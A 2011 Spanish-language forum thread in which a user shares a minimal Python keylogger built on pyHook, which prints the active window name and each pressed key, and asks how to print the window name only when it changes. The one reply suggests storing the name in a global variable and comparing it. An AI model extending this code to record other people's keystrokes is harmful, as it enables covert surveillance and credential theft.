elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Python] print solo si cambia la variable
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Python] print solo si cambia la variable  (Leído 3,288 veces)
Fyrox

Desconectado Desconectado

Mensajes: 35


Ver Perfil
[Python] print solo si cambia la variable
« en: 18 Septiembre 2011, 01:12 am »

Buenas de nuevo, esta vez mas que un error traigo una duda sobre un programilla que estoy intentando hacer. Veréis. me he lanzado a hacer un pequeño keylogger local muy muy básico (de momento, ya lo ampliare) con el modulo pyHook. Aquí esta:

Código
  1. import pythoncom, pyHook
  2.  
  3. def strokes(event):
  4.    print event.WindowName
  5.    print event.Key
  6.  
  7. hm = pyHook.HookManager()
  8. hm.KeyDown = strokes
  9. hm.HookKeyboard()
  10. pythoncom.PumpMessages()
  11.  

Bien, este pequeño keylogger hace que cada vez que se pulse una tecla imprima en el programa el nombre de la ventana y la tecla. Esto queda bastante mal a la hora de leer lo que se ha escrito, ya que se escribiria el nombre de la ventana por cada tecla que se pulsase. Para solucionarlo, lo que quiero hacer es que imprima el nombre de la ventana, la tecla pulsada, y luego solamente imprima de nuevo el nombre de la ventana si esta cambia, no se si me explico.

Por ejemplo: escribes "facebook" en google, por lo que el nombre de la ventana seria "Google". A partir de ahi, quiero que solamente vuelva a escribir el nombre de la ventana si deja de ser "Google" para ser "Facebook" por ejemplo. Gracias de antemano.


« Última modificación: 18 Septiembre 2011, 01:16 am por Fyrox » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [Python] print solo si cambia la variable
« Respuesta #1 en: 28 Septiembre 2011, 04:13 am »

Prueba guardando en una variable global para luego con un IF cotejar su valor

Saludos


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Python] Comprobar que una variable es None (solucionado)
Scripting
Ragnarok 0 8,972 Último mensaje 22 Marzo 2007, 13:23 pm
por Ragnarok
Duda con print en python
Scripting
SARGE553413 1 2,505 Último mensaje 20 Febrero 2014, 16:43 pm
por EzianGES
Ayuda: cada ves que imprimo mi variable Float, cambia el contenido e.e
Programación C/C++
grox1 7 3,433 Último mensaje 13 Noviembre 2014, 04:18 am
por rir3760
ayuda con este codigo de python sumar incrementos de resultados print
Scripting
GEORGEFRT 3 2,243 Último mensaje 18 Abril 2015, 01:34 am
por Br1ant
No cambia el valor de mi variable JS
Desarrollo Web
SrTrp 4 3,555 Último mensaje 3 Mayo 2020, 22:52 pm
por @XSStringManolo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines